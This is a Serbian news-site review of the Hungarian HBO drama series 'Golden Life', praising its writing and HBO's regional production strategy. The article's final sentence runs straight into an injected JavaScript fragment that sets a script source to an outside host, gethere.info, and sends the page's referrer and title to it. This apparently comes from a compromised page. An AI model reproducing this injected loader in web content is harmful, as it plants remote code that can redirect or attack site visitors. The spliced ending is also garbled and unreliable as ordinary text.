25.05.2016. 12:48
ekspres

TV KRITIKA: "Lagodan život" - i Mađari imaju serije

Ekspres.net
Izvor: Ekspres.net

Dok žena u kasnim tridesetim, skrivena iza kačketa i bezoblične odeće, dugim koracima protrčava pokraj visokih ograda iza kojih naziremo velelepne kuće, shvatamo da se radnja odvija u predgrađu koje pripada novoj klasi bogataša, u kojoj se na ulici ne vide ni deca ni ljudi, pa čak ni automobili.

Rano je jutro, ona kao da tu ne pripada i dok se dron penje visoko, visoko, otkrivajući nam da je u pozadini panorama nekog nama poznatog grada, zapažamo da je naša junakinja usporila pored jedne kapije i iz sandučeta ukrala neki debeo, luksuzan magazin.

Taman kad pomislimo da smo shvatili i da je ona neko ko krade po bogatom kraju, pretvarajući se da džogira, žena se hvata za kvaku najveće od svih ograda i ulazi u najluksuzniju od svih kuća. Njenu. Ni špica se nije završila, a ja zaključujem da će ova serija morati da se gleda.

Drama i triler u isto vreme

U pitanju je mađarska serija od osam epizoda pod nazivom "Lagodan život" (internacionalni naslov je "Golden Life"), dramska serija koja ima elemente trilera, ali koja se već prvom epizodom pozicionirala i kao društveno angažovana. Zanimljivo je da na trenutke deluje kao da je reč o spin-ofu srpskog filma "Vlažnost" Nikole Ljuce, jer je reč o ljudima koje bismo mogli s jedne strane nazvati dobitnicima tranzicije, ali koji su, kao posledicu dobitka na jednoj strani, izgleda mnogo više izgubili kao konzumerska, ali ipak ljudska bića.

Ipak 2015, nije isto što i devedesete. Odmah se otvaraju teme raspada porodice, sukoba starih i novih, odnosa prema roditeljima i njihovom socijalističkom moralu, ali i deci i njihovom nedostatku bilo kakvog sistema vrednosti. Reč je o klasi koja se na kriminalu uzdigla vrlo visoko, ali joj vreme ističe. Odlično napisano, solidno režirano i fantastično odigrano.

Pojava mađarske serije na HBO-u rezultat je nove strategije ovog giganta televizijskog kontenta, a to je da se originalan sadržaj (content) proizvodi u istočnoj i centralnoj Evropi, uz angažovanje lokalnih pisaca i reditelja. Krenulo se sa adaptacijama tj. formatima, zatim je Agnješka Holand izašla sa svojom produkcijom "Ognjenog grma", a sada se otišlo još jedan korak dalje, pa su produkcije iz Češke, Poljske i Mađarske, uz budno oko producenata i script doctora iz Velike Britanije i SAD, ušle u razvoj sopstvenih, originalnih sadržaja, koji kvalitetom i nivoom produkcije prate HBO produkcije, a gledanošću u domicilnim zemljama pobeđuju čak i "Igre prestola" ili "Carstvo poroka".

Možda jednog dana...

Da li će se ova eksplozija kreativnosti i kvalitetne produkcije dogoditi i kod nas? Možda jednog dana, kad oni koji odlučuju o tome šta će biti na našim TV programima shvate da je rast gledanosti moguć samo tamo gde se ulaže u razvoj dobrih scenarija, gde se cene originalnost i hrabrost, ali i gde se zna da je ulaganje u kvalitetnu produkciju jedini način da to ne bude trošak, već ulaganje i, a zašto da ne - dobar poslovni potez.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
few clouds
30°C
14.07.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Euro 2024

Vidi sve

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve